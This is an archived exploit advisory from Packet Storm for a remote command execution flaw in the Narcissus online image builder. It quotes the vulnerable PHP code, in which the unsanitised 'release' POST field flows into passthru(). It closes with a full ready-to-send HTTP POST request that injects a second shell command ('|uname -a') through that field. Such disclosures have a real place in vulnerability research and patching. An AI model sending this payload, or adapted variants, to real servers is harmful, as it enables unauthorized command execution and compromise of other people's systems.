what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Narcissus Remote Command Execution

Narcissus Remote Command Execution
Posted Nov 15, 2012
Authored by dun

Narcissus online image builder suffers from a remote command execution vulnerability.

tags | exploit, remote
SHA-256 | 1e7e866c2471ee4f3e78a4cbfbe1c015cc3162c100922051cb553dfb05ba2c43

Narcissus Remote Command Execution

Change Mirror Download
:::::::-.   ...    ::::::.    :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM

[ Discovered by dun \ posdub[at]gmail.com ]
[ 2012-11-13 ]
##########################################################
# [ Narcissus ] Remote Command Execution Vulnerability #
##########################################################
#
# Script: "Narcissus - Online image builder for the angstrom distribution"
#
# Vendor: http://www.angstrom-distribution.org/
# Download: https://github.com/Angstrom-distribution/narcissus
#
# Vendor was informed some time ago, but did not respond yet.
#
##########################################################
#
# [ Remote Command Execution ]
#
# File: /narcissus/backend.php ( lines: 10-183 ):
# ..cut..
# if (isset($_POST["action"]) && $_POST["action"] != "") {
# $action = $_POST["action"]; // 1
# } else {
# print "Invalid action: $action";
# exit;
# }
#
# if (isset($_POST["machine"])) {
# $machine = escapeshellcmd(basename($_POST["machine"])); // 2
# } else {
# print "Invalid machine";
# exit;
# }
# ..cut..
# if (isset($_POST["release"]) && $_POST["release"] != "") {
# $release = $_POST["release"]; // 3
# } else {
# $release = "stable";
# }
# ..cut..
# switch($action) {
# ..cut..
# case "configure_image": // 4
# print "configuring\n";
# configure_image($machine, $name, $release); // 5
# break;
# ..cut..
# function configure_image($machine, $name, $release) {
# print "Machine: $machine, name: $name\n";
# passthru ("scripts/configure-image.sh $machine $name-image $release && exit"); // 6 [RCE]
# }
# ..cut..
#
# Vuln:
# http://localhost/narcissus/backend.php
#
# POST /narcissus/backend.php HTTP/1.1
# Host: localhost
# User-Agent: Mozilla/5.0 Gecko/20100101 Firefox/16.0
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# Accept-Language: pl,en-us;q=0.7,en;q=0.3
# Accept-Encoding: gzip, deflate
# Connection: keep-alive
# Content-Type: application/x-www-form-urlencoded
# Content-Length: 50
# machine=0&action=configure_image&release=|uname -a
#
### [ dun / 2012 ] #######################################

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    38 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close